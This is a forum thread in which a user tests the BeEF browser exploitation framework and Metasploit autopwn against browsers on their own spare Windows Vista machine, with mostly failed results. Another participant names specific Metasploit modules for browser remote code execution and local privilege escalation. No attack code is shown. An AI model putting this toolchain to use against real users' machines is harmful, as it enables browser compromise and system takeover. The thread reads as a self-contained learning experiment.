Adventures with BeEF

Adventures with BeEF (and Metasploit)

As promised I will post the results of my experiments with the BeEF live DVD here.

Test platform: Windows Vista Ultimate RTM, with UAC + SRP. This is running on real hardware, not a VM. The BeEF DVD is also running on a real computer.

Mandatory disclaimer: I AM DOING THIS FOR EDUCATIONAL PURPOSES ONLY. The only computer getting pwned is one of my own spares, which I'm not using for anything else right now. I won't give details on how to use BeEF, only the results. If anyone wants to advise me on how to get better results in these tests, please send a PM instead of posting it publicly.

Anyway...

First run:

- Metasploit failed to start for some reason. I'm currently updating it, hopefully that will fix the issue.

- Running the "clippy" social engineering animation -> successful. Well, duh.

- Attempting to read local files through Javascript -> not successful. Not sure why, I did specify the correct path to the test file.

- Man-in-the-browser -> definitely successful; seems it can watch everything one does with Firefox, so long as you keep the "hostile" website open. That includes the coordinates of mouse clicks, and even whether the window is focused.

Haven't attempted any code injection stuff yet. Will post more when I have Metasploit working.

 

Okay, Metasploit is working now; I had to start it and BeEF manually. Unfortunately(?) there don't seem to be any exploits known to it that work on Firefox 20.0.1 right now; so for the time being I'm falling back on IE 7, which should be very exploitable.

Next step: try to actually load something through an exploit.

 

I'm having a lot of trouble verifying that any of this stuff is working at all. No entries in Windows event viewer logs, no output on the BeEF control panel, nada. I think I will look into using the Metasploit console interface, hopefully that will be a little more self-explanatory. (Yeah, right.)

Edit: I will get back to this tomorrow. Maybe it will make sense in the morning.

 

After doing some research I decided to go with Metasploit and the "autopwn" module. It takes a loooong time to load though. I will report the results once I get to see them...

 

Okay, current results:

- Fails with IE 7. IE stops loading the page, claiming inability to render it, and autopwn cannot proceed.

- Fails with Firefox 20.0.1. It looks like there are no workable exploits for the current version (not unless I install Quicktime at least).

- Succeeds, at least partially, with Opera 12.15. A search of the browser history (visible to the user) is invoked. However, this causes Opera to stop displaying the hostile site, so further compromise apparently can't proceed; and anyway it looks (though I'm not sure?) like this history search thing doesn't involve full control of the browser process.

I will try again shortly with older versions of Opera and Firefox.

 

And a bit more:

- Firefox 9.0: fails. autopwn gets stuck on an Apple Quicktime exploit that doesn't work (because Quicktime isn't installed, and I don't intend to install it).

- Opera 12.00: succeeds, but again never even gets to attempting a payload execution. Yoinking my browser history is all well and good, but not nearly enough - and it's also visible to me, so I know someone's been messing around.

---

This was the point at which I decided to throw in the towel for today. It's become clear that (at this point) I don't know what I'm doing, and am not going to prove or disprove anything this way. Sorry folks, I just don't have the experience required.

I can see why Blackhole and other exploit kits have gotten popular though. Luckily for us, going after the browser itself seems to be an exercise in frustration at this point...

 

Takes some time to figure out how to use those programs. Can't find the old metasploit videos I had... sucks, cause I needed to watch those lol but there are some good resources out there.

 

That much is clear. The msfconsole 'help' command is... singularly unhelpful.

 

If I'm not too busy fixing my system I'll download XP and Armitage and set up an exploitable VM. Armitage is wonderful, I highly suggest you look into it. It runs with metasploit modules/ exploit/ payload code, and you can use the Metasploit console, but it provides a full interface for it all.

Disk space is currently an issue. If I can fit XP onto it it should work out. After that I'll do Armitage and see if I can work local exploits into it. If not I'll just do some simple demonstration.

No promises, I have a lot to do, but that's the "plan" for now if nothing else takes up my time.

edit: Ideally I'll be running http://www.metasploit.com/modules/exploit/windows/local/ms11_080_afdjoinleaf from shell, but I may just show RCE and then show local separately, and explain how it would work in an actual attack, in case metaploit doesn't support running the exploit from memory.

Maybe http://www.metasploit.com/modules/exploit/windows/local/payload_inject

RCE is looking like: http://www.metasploit.com/modules/exploit/multi/browser/firefox_escape_retval

 

Thanks. Looking forward to the results, if you can get around to it... Meanwhile I shall look into the Armitage GUI, that sounds like what I want.